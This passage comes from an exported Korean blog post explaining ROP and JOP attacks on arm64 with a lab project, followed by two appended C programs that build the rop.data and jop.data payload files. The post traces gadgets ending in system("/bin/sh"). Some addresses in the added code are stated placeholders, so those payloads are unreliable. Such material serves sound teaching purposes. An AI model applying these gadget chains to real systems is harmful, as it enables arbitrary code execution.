data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000441d84 &lt;+260>:\tldp\tx0, x1, [x29, #48]\n0x0000000000441d88 &lt;+264>:\tldp\td0, d1, [x29, #64]\n0x0000000000441d8c &lt;+268>:\tldp\td2, d3, [x29, #80]\n0x0000000000441d90 &lt;+272>:\tldr\tx30, [x29, #232]\n0x0000000000441d94 &lt;+276>:\tmov\tsp, x29\n0x0000000000441d98 &lt;+280>:\tldr\tx29, [x29]\n0x0000000000441d9c &lt;+284>:\tadd\tsp, sp, #0x100\n0x0000000000441da0 &lt;+288>:\tbr\tx30<\/pre>\n<\/div><\/div>\n\n\n\n<p>\uc704 \uba85\ub839\uc5b4\ub4e4\uc744 \uc218\ud589\ud588\uc744\ub54c\ub97c \uc2a4\ud0dd\uacfc \uac19\uc774 \uadf8\ub9bc\uc73c\ub85c \uc124\uba85\ud558\uba74 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"600\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-1024x600.png\" alt=\"\" class=\"wp-image-2635\" 
srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-1024x600.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-300x176.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-768x450.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-1536x900.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-2048x1200.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>0x0000000000441d84 &lt;+260&gt;: ldp x0, x1, [x29, #48]<\/strong><br>\uac01\uac01 <br><strong>x0 \ub808\uc9c0\uc2a4\ud130\ub294 x29+48 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0 system \ud568\uc218 \uc8fc\uc18c,<\/strong><br>x1 \ub808\uc9c0\uc2a4\ud130\ub294 x29+56 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0 0x441d84 \uac12\uc774 \ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441d88 &lt;+264&gt;: ldp d0, d1, [x29, #64]<br>0x0000000000441d8c &lt;+268&gt;: ldp d2, d3, [x29, #80]<\/strong><br>d0, d1, d2&#8230; \ub808\uc9c0\uc2a4\ud130\ub294 \ubca1\ud130 \ubc0f \ubd80\ub3d9 \uc18c\uc218\uc810 \uc5f0\uc0b0\ud558\ub294\ub370 \uc0ac\uc6a9\ub418\ubbc0\ub85c \ubb34\uc2dc\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441d90 &lt;+272&gt;: ldr x30, [x29, #232]<\/strong><br>x30 \ub808\uc9c0\uc2a4\ud130\uac00 x29+232 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0 <strong><br>x30 \ub808\uc9c0\uc2a4\ud130\ub294 0x441cf4 \uac00\uc82f \uc8fc\uc18c\ub97c \uac00\uc9c4\ub2e4.<\/strong><\/p>\n\n\n\n<p><strong>0x0000000000441d94 &lt;+276&gt;: mov sp, x29<\/strong><br>\uc774\ubbf8 sp\uc640 x29\uac12\uc774 \uac19\uae30 \ub54c\ubb38\uc5d0 \ubb34\uc2dc\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441d98 &lt;+280&gt;: ldr x29, [x29]<\/strong><br>x29 \ub808\uc9c0\uc2a4\ud130\ub294 \ub85c\ub4dc\uc2dc\ucf1c \uc774\uc81c x29 \uc8fc\uc18c\uc5d0 \uc788\ub294 \uac12\uc744 
\uac00\uc9c0\uac8c \ub418\uc5b4<br>main() \ud504\ub808\uc784 \ud3ec\uc778\ud130 \uc8fc\uc18c\uac12\uc778 0x7ffffff2f0\uc774 \ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441d9c &lt;+284&gt;: add sp, sp, #0x100<\/strong><br>sp \uc2a4\ud0dd \ud504\uc778\ud130\uac00 0x100\ub9cc\ud07c \uc99d\uac00\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441da0 &lt;+288&gt;: br x30<\/strong><br>BR\uc740 Branch\ub85c, BL\/BLR \uba85\ub839\uc5b4\uc640 \ub2ec\ub9ac \ud568\uc218\uac00 \ub05d\ub098\uace0 \ubcf5\uadc0\ud558\uc9c0 \uc54a\ub294\ub2e4. <br>x86_64 \uc544\ud0a4\ud14d\ucc98\uc758 jmp \uba85\ub839\uc5b4\uc640 \ube44\uc2b7\ud558\ub2e4\uace0 \ubcf4\uba74 \ub41c\ub2e4.<br><strong>\ub530\ub77c\uc11c, pc\ub294 x30 \ub808\uc9c0\uc2a4\ud130 \uac12\uc778 0x441cf4 \uac00\uc82f\uc73c\ub85c \ubd84\uae30\ub41c\ub2e4.<\/strong><\/p>\n\n\n\n<p>\ubd84\uae30\ub41c \ud6c4, \uc2e4\ud589\ub420 0x441cf4 \uac00\uc82f\uc744 \ud55c\ubc88 \uc0b4\ud3b4\ubcf4\uc790.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000441cf4 &lt;+116>:\tmov\tx16, x0\n0x0000000000441cf8 &lt;+120>:\tldp\tx0, x1, [x29, #96]\n0x0000000000441cfc &lt;+124>:\tldp\tx2, x3, [x29, #112]\n0x0000000000441d00 &lt;+128>:\tldp\tx4, x5, [x29, #128]\n0x0000000000441d04 &lt;+132>:\tldp\tx6, x7, [x29, #144]\n0x0000000000441d08 &lt;+136>:\tldp\td0, d1, [x29, #160]\n0x0000000000441d0c &lt;+140>:\tldp\td2, d3, [x29, #176]\n0x0000000000441d10 &lt;+144>:\tldp\td4, d5, [x29, #192]\n0x0000000000441d14 &lt;+148>:\tldp\td6, d7, [x29, #208]\n0x0000000000441d18 &lt;+152>:\tldp\tx29, x30, [x29]\n0x0000000000441d1c &lt;+156>:\tadd\tsp, sp, #0x100\n0x0000000000441d20 
&lt;+160>:\tbr\tx16<\/pre>\n<\/div><\/div>\n\n\n\n<p>\uc704 \uba85\ub839\uc5b4\ub4e4\uc744 \uc218\ud589\ud588\uc744\ub54c\ub97c \uc2a4\ud0dd\uacfc \uac19\uc774 \uadf8\ub9bc\uc73c\ub85c \uc911\uc694\ud55c \ubd80\ubd84\ub9cc \ub098\ud0c0\ub0b4\uba74 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"712\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-1024x712.png\" alt=\"\" class=\"wp-image-2636\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-1024x712.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-300x209.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-768x534.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-1536x1068.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-2048x1424.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\uc911\uc694\ud55c \ubd80\ubd84\ub9cc \uc124\uba85\ud558\uc790\uba74,<\/p>\n\n\n\n<p><strong>0x0000000000441cf4 &lt;+116&gt;: mov x16, x0<\/strong><br>x0 \ub808\uc9c0\uc2a4\ud130\ub85c\ubd80\ud130 \ubcf5\uc0ac\ubc1b\uae30 \ub54c\ubb38\uc5d0<br><strong>x16 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 system \ud568\uc218 \uc8fc\uc18c\ub97c \uac00\uc9c4\ub2e4.<\/strong><\/p>\n\n\n\n<p><strong>0x0000000000441cf8 &lt;+120&gt;: ldp x0, x1, [x29, #96]<\/strong><br>x29+96 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\uc2dc\ud0a4\uae30 \ub54c\ubb38\uc5d0 <br><strong>x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc774 &#8220;\/bin\/sh&#8221; \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c \uac00\uc9c0\uac8c \ub41c\ub2e4.<\/strong><\/p>\n\n\n\n<p>\ub098\uba38\uc9c0\ub294 \ud06c\uac8c \uc2e0\uacbd \uc548\uc368\ub3c4 \ub418\uace0,<\/p>\n\n\n\n<p><strong>0x0000000000441d20 &lt;+160&gt;: br x16<\/strong><br>\uc774\uc81c x16 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc788\ub358 system \ud568\uc218 
\uc8fc\uc18c\ub85c \ubd84\uae30\ub418\uae30 \ub418\ubbc0\ub85c,<br>\ucd5c\uc885\uc801\uc73c\ub85c system(&#8220;\/bin\/sh&#8221;) \ud568\uc218\uac00 \ud638\ucd9c\ub418\ub294 \uac83\uc774\ub2e4.<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\uc774\ubc88 \uc2dc\uac04\uc5d0\ub294 rop, jop \uacf5\uaca9\uc744 \uc774\ud574\ud558\uae30 \uc704\ud574 \uc544\ub798 \ud504\ub85c\uc81d\ud2b8\ub97c \ud65c\uc6a9\ud558\uc5ec \uc9c1\uc811 \ub514\ubc84\uae45\ud558\uba74\uc11c \uc2a4\ud0dd \ud504\ub808\uc784\uc774 \uc0dd\uaca8\uc9c0\ub294 \uacfc\uc815\uacfc \uac01 \uba85\ub839\uc5b4 \uc758\ubbf8, \uac01 \ubc94\uc6a9 \ub808\uc9c0\uc2a4\ud130\ub4e4\uc774 \uc5b4\ub5bb\uac8c \ud65c\uc6a9\ub418\ub294\uc9c0 \uc54c\uc544\ubcfc \uac83\uc774\ub2e4. https:\/\/github.com\/geesun\/arm64_rop_jop ROP 1. \uc2a4\ud0dd \ud504\ub808\uc784 \ud615\uc131 \ubc0f \uac01 \uba85\ub839\uc5b4 \uc218\ud589 \uacfc\uc815 \uc774\ud574\ud558\uae30 main \ucf54\ub4dc \uc5b4\uc148\ube14\ub7ec \uc124\uba85 x29 \ub808\uc9c0\uc2a4\ud130\ud504\ub808\uc784 \ud3ec\uc778\ud130 \ub808\uc9c0\uc2a4\ud130\ub85c, \uc2a4\ud0dd \ud504\ub808\uc784\uc744 \ucd94\uc801\ud560 \ub54c \uc0ac\uc6a9\ub41c\ub2e4.\ud568\uc218\uac00 \ud638\ucd9c\ub418\uc5b4 \uc0c8\ub85c\uc6b4 \uc2a4\ud0dd \ud504\ub808\uc784\uc774&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=2558\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">arm64 \ud658\uacbd\uc5d0\uc11c rop, jop \uacf5\uaca9 
\uc774\ud574\ud558\uae30<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-2558","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2558","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2558"}],"version-history":[{"count":28,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2558\/revisions"}],"predecessor-version":[{"id":2662,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2558\/revisions\/2662"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2558"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2558"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2558"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
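Worked example for section 2 (the ROP chain), added here by the editor; it is not code from the original post or from the geesun/arm64_rop_jop project. It builds the 512-byte rop.data image from the frame layout read off the disassembly above (u64 at x29+16, a 48-byte frame for rop_bad_func, main's 16-byte frame directly above it) and then replays the two epilogues and the two gadgets over a model of the stack, instruction by instruction, to confirm that the chain ends at system() with x0 pointing at "/bin/sh". The gadget addresses 0x44f02c and 0x44f080, the system() address 0x406ae8 and main's return address 0x400470 are the ones shown in the post; the "/bin/sh" address 0x450d10 (the value the first gadget loads into x19 in the screenshot), the frame-pointer value passed to replay_rop and all function names are assumptions.

```c
/*
 * Added example (editor's code, not from the original post or the
 * arm64_rop_jop project): build the rop.data payload implied by the
 * disassembly of rop_bad_func and main, then replay the two epilogues and
 * the two gadgets over a model of the stack to check that the chain ends
 * at system() with x0 pointing at "/bin/sh".
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ROP_GADGET1 0x44f02cULL  /* ldr x19,[sp,#16]; ldp x29,x30,[sp],#48; ret             (from the post) */
#define ROP_GADGET2 0x44f080ULL  /* mov x0,x19; ldr x19,[sp,#16]; ldp x29,x30,[sp],#48; ret (from the post) */
#define SYSTEM_ADDR 0x406ae8ULL  /* system() in the static binary                           (from the post) */
#define MAIN_RET    0x400470ULL  /* instruction after "bl rop_bad_func" in main             (from the post) */
#define BINSH_ADDR  0x450d10ULL  /* ASSUMED: address of a "/bin/sh" string in the binary    */
#define JUNK        0xffffffffffffffffULL
#define PAYLOAD_LEN 512          /* read(fd, &u64, 512) */

/* Payload offsets are relative to &u64, which is x29+16 inside rop_bad_func.
 * rop_bad_func's frame is 48 bytes (saved x29/x30 at +0/+8, u64 at +16,
 * data[16] at +24, fd at +44); main's 16-byte frame sits directly above it. */
enum {
    OFF_MAIN_X29 = 32,   /* x29+48: main's saved frame pointer (don't care)     */
    OFF_MAIN_X30 = 40,   /* x29+56: main's return address  -> gadget 1          */
    OFF_G1_X29   = 48,   /* sp after main's "ldp ...,#16; ret" points here      */
    OFF_G1_X30   = 56,   /* gadget 1 pops this into x30    -> gadget 2          */
    OFF_G1_X19   = 64,   /* gadget 1: ldr x19,[sp,#16]     -> "/bin/sh" pointer */
    OFF_G2_X29   = 96,   /* sp after gadget 1's "ldp ...,#48" points here       */
    OFF_G2_X30   = 104,  /* gadget 2 pops this into x30    -> system()          */
};

static void     put64(uint8_t *b, size_t off, uint64_t v) { memcpy(b + off, &v, 8); }
static uint64_t get64(const uint8_t *b, size_t off) { uint64_t v; memcpy(&v, b + off, 8); return v; }

/* Produce the 512-byte image of rop.data. Everything not listed is filler. */
void build_rop_payload(uint8_t out[PAYLOAD_LEN]) {
    memset(out, 0xff, PAYLOAD_LEN);            /* u64, data[16], fd and don't-care slots */
    put64(out, OFF_MAIN_X30, ROP_GADGET1);
    put64(out, OFF_G1_X30,   ROP_GADGET2);
    put64(out, OFF_G1_X19,   BINSH_ADDR);
    put64(out, OFF_G2_X30,   SYSTEM_ADDR);
}

typedef struct { uint64_t pc, sp, x0, x19, x29, x30; } regs_t;

static uint64_t ld(const uint8_t *stack, uint64_t base, uint64_t addr) {
    return get64(stack, (size_t)(addr - base));
}

/* Replay the chain from rop_bad_func's epilogue. `bad_x29` (ASSUMED value) is
 * that function's frame pointer; the model stack is a 1 KiB window around it. */
regs_t replay_rop(const uint8_t payload[PAYLOAD_LEN], uint64_t bad_x29) {
    uint8_t stack[1024];
    uint64_t base = bad_x29 - 64;
    memset(stack, 0, sizeof stack);
    put64(stack, (size_t)(bad_x29 - base),     bad_x29 + 48);   /* saved x29: main's frame pointer */
    put64(stack, (size_t)(bad_x29 + 8 - base), MAIN_RET);       /* saved x30: intact, below u64    */
    memcpy(stack + (bad_x29 + 16 - base), payload, PAYLOAD_LEN);  /* what read() wrote at &u64     */

    regs_t r = { .sp = bad_x29 };
    /* rop_bad_func: ldp x29,x30,[sp],#48 ; ret */
    r.x29 = ld(stack, base, r.sp); r.x30 = ld(stack, base, r.sp + 8); r.sp += 48; r.pc = r.x30;
    if (r.pc != MAIN_RET) return r;
    /* main: mov w0,#0 ; ldp x29,x30,[sp],#16 ; ret  (x30 now comes from the overflow) */
    r.x29 = ld(stack, base, r.sp); r.x30 = ld(stack, base, r.sp + 8); r.sp += 16; r.pc = r.x30;
    if (r.pc != ROP_GADGET1) return r;
    /* 0x44f02c: ldr x19,[sp,#16] ; ldp x29,x30,[sp],#48 ; ret */
    r.x19 = ld(stack, base, r.sp + 16);
    r.x29 = ld(stack, base, r.sp); r.x30 = ld(stack, base, r.sp + 8); r.sp += 48; r.pc = r.x30;
    if (r.pc != ROP_GADGET2) return r;
    /* 0x44f080: mov x0,x19 ; ldr x19,[sp,#16] ; ldp x29,x30,[sp],#48 ; ret */
    r.x0  = r.x19;
    r.x19 = ld(stack, base, r.sp + 16);
    r.x29 = ld(stack, base, r.sp); r.x30 = ld(stack, base, r.sp + 8); r.sp += 48; r.pc = r.x30;
    return r;   /* pc == SYSTEM_ADDR with x0 == BINSH_ADDR means system("/bin/sh") */
}

int main(void) {
    uint8_t payload[PAYLOAD_LEN];
    build_rop_payload(payload);
    FILE *f = fopen("rop.data", "wb");                  /* the file rop_bad_func opens */
    if (f) { fwrite(payload, 1, PAYLOAD_LEN, f); fclose(f); }
    regs_t r = replay_rop(payload, 0x7ffffff2f0ULL);    /* ASSUMED frame-pointer value */
    printf("pc=%#llx x0=%#llx -> %s\n", (unsigned long long)r.pc, (unsigned long long)r.x0,
           (r.pc == SYSTEM_ADDR && r.x0 == BINSH_ADDR) ? "system(\"/bin/sh\")" : "chain broken");
    return 0;
}
```

The replay makes the two points of the section mechanical: rop_bad_func's own return address survives because it lies below u64, so the first hijacked control transfer is main's ret, and every subsequent gadget must reload x30 from the stack before its ret, which fixes where each slot of the payload has to go. Re-running with a different frame size or gadget set only requires changing the offsets in the enum; the chain is then re-checked against the model before touching the real binary.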
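Worked example for the JOP section, added here by the editor; it is not code from the original post or from the geesun/arm64_rop_jop project. It builds the jop.data image from the IDA stack layout of jop_bad_func (u64 at x29+0x18, fd at x29+0x34, func at x29+0x38) and replays the two gadgets at 0x441d84 and 0x441cf4 over a model of the stack, including the x29 reload that moves the second gadget's base to main's frame, to confirm that the chain ends with `br x16` into system() and x0 pointing at "/bin/sh". The gadget addresses and the offsets inside them come from the post. The system() address (the post gives none for the jop binary; 0x406ae8 from the ROP part is reused as a placeholder), the "/bin/sh" address, the 64-byte frame size of jop_bad_func, the frame-pointer value passed to replay_jop and all function names are assumptions.

```c
/*
 * Added example (editor's code, not from the original post or the
 * arm64_rop_jop project): build the jop.data payload implied by the IDA
 * stack layout of jop_bad_func and replay the two gadgets over a model of
 * the stack to check that the chain ends with "br x16" into system() and
 * x0 pointing at "/bin/sh".
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define JOP_GADGET1 0x441d84ULL  /* ldp x0,x1,[x29,#48]; ...; ldr x30,[x29,#232]; mov sp,x29; ldr x29,[x29]; add sp,sp,#0x100; br x30 */
#define JOP_GADGET2 0x441cf4ULL  /* mov x16,x0; ldp x0,x1,[x29,#96]; ...; ldp x29,x30,[x29]; add sp,sp,#0x100; br x16            */
#define SYSTEM_ADDR 0x406ae8ULL  /* ASSUMED: the post gives no system() address for the jop binary; ROP-part value reused       */
#define BINSH_ADDR  0x450d10ULL  /* ASSUMED: address of a "/bin/sh" string in the binary                                        */
#define JUNK        0xffffffffffffffffULL
#define PAYLOAD_LEN 512          /* read(fd, &u64, 512) */
#define JOP_FRAME   64           /* ASSUMED: frame size of jop_bad_func (its locals end at x29+0x40) */

/* Payload offsets are relative to &u64 = x29+0x18 (IDA: u64 @0x18, data @0x20,
 * fd @0x34, func @0x38). Gadget 2 runs after "ldr x29,[x29]", i.e. with x29 =
 * main's frame pointer = jop_bad_func's x29 + JOP_FRAME. */
enum {
    OFF_G1_X0  = 48 - 0x18,              /* ldp x0,x1,[x29,#48]       -> x0 = system()          */
    OFF_FUNC   = 56 - 0x18,              /* the func pointer (also x1) -> gadget 1              */
    OFF_G2_X0  = JOP_FRAME + 96 - 0x18,  /* ldp x0,x1,[main_x29,#96]  -> x0 = "/bin/sh" pointer */
    OFF_G1_X30 = 232 - 0x18,             /* ldr x30,[x29,#232]        -> gadget 2               */
};

static void     put64(uint8_t *b, size_t off, uint64_t v) { memcpy(b + off, &v, 8); }
static uint64_t get64(const uint8_t *b, size_t off) { uint64_t v; memcpy(&v, b + off, 8); return v; }

/* Produce the 512-byte image of jop.data. Everything not listed is filler. */
void build_jop_payload(uint8_t out[PAYLOAD_LEN]) {
    memset(out, 0xff, PAYLOAD_LEN);
    put64(out, OFF_G1_X0,  SYSTEM_ADDR);
    put64(out, OFF_FUNC,   JOP_GADGET1);
    put64(out, OFF_G2_X0,  BINSH_ADDR);
    put64(out, OFF_G1_X30, JOP_GADGET2);
}

typedef struct { uint64_t pc, sp, x0, x1, x16, x29, x30; } regs_t;

static uint64_t ld(const uint8_t *stack, uint64_t base, uint64_t addr) {
    return get64(stack, (size_t)(addr - base));
}

/* Replay from the func() call in jop_bad_func. `jop_x29` (ASSUMED value) is
 * that function's frame pointer; the model stack is a 1 KiB window around it. */
regs_t replay_jop(const uint8_t payload[PAYLOAD_LEN], uint64_t jop_x29) {
    uint8_t stack[1024];
    uint64_t base = jop_x29 - 64;
    memset(stack, 0, sizeof stack);
    put64(stack, (size_t)(jop_x29 - base), jop_x29 + JOP_FRAME);     /* saved x29: main's frame pointer */
    memcpy(stack + (jop_x29 + 0x18 - base), payload, PAYLOAD_LEN);   /* what read() wrote at &u64       */

    regs_t r = { .sp = jop_x29, .x29 = jop_x29 };
    r.pc = ld(stack, base, r.x29 + 0x38);   /* func(): load the (overwritten) pointer, then blr */
    if (r.pc != JOP_GADGET1) return r;
    /* 0x441d84 */
    r.x0  = ld(stack, base, r.x29 + 48);    /* ldp x0,x1,[x29,#48]                 */
    r.x1  = ld(stack, base, r.x29 + 56);
    r.x30 = ld(stack, base, r.x29 + 232);   /* ldr x30,[x29,#232]; d0..d3 skipped  */
    r.sp  = r.x29;                          /* mov sp,x29                          */
    r.x29 = ld(stack, base, r.x29);         /* ldr x29,[x29] -> main's frame ptr   */
    r.sp += 0x100;                          /* add sp,sp,#0x100                    */
    r.pc  = r.x30;                          /* br x30                              */
    if (r.pc != JOP_GADGET2) return r;
    /* 0x441cf4 */
    r.x16 = r.x0;                           /* mov x16,x0                          */
    r.x0  = ld(stack, base, r.x29 + 96);    /* ldp x0,x1,[x29,#96]; x2..x7/d0..d7 skipped */
    r.x1  = ld(stack, base, r.x29 + 104);
    uint64_t fp = r.x29;                    /* ldp x29,x30,[x29]                   */
    r.x29 = ld(stack, base, fp);
    r.x30 = ld(stack, base, fp + 8);
    r.sp += 0x100;                          /* add sp,sp,#0x100                    */
    r.pc  = r.x16;                          /* br x16                              */
    return r;   /* pc == SYSTEM_ADDR with x0 == BINSH_ADDR means system("/bin/sh") */
}

int main(void) {
    uint8_t payload[PAYLOAD_LEN];
    build_jop_payload(payload);
    FILE *f = fopen("jop.data", "wb");                  /* the file jop_bad_func opens */
    if (f) { fwrite(payload, 1, PAYLOAD_LEN, f); fclose(f); }
    regs_t r = replay_jop(payload, 0x7ffffff2b0ULL);    /* ASSUMED frame-pointer value */
    printf("pc=%#llx x16=%#llx x0=%#llx -> %s\n", (unsigned long long)r.pc,
           (unsigned long long)r.x16, (unsigned long long)r.x0,
           (r.pc == SYSTEM_ADDR && r.x0 == BINSH_ADDR) ? "system(\"/bin/sh\")" : "chain broken");
    return 0;
}
```

Two details the replay makes visible: the overwritten func slot is also what lands in x1 (ldp x0,x1,[x29,#48] covers x29+48 and x29+56), and the "/bin/sh" slot has to be placed relative to main's frame, not jop_bad_func's, because the first gadget has already executed ldr x29,[x29] by the time the second gadget loads x0. The JOP_FRAME constant is the only assumption the second offset depends on; if the real prologue reserves a different amount, the x0 slot moves by the same delta.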